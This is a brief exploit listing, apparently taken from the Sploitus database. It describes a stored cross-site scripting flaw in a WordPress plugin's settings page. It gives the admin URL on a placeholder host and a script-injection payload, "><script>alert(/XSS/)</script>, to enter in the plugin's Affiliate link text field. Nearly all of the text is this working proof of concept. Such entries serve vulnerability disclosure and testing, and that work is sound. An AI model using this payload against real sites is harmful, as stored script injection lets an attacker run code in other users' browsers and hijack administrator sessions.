## https://sploitus.com/exploit?id=WPEX-ID:EA0180CD-E018-43EA-88B9-FA8E71BF34BF On http://target.tld/wp-admin/edit.php?post_type=spucpt&page=spu_settings Add the payload "><script>alert(/XSS/)</script> on the Affiliate link text field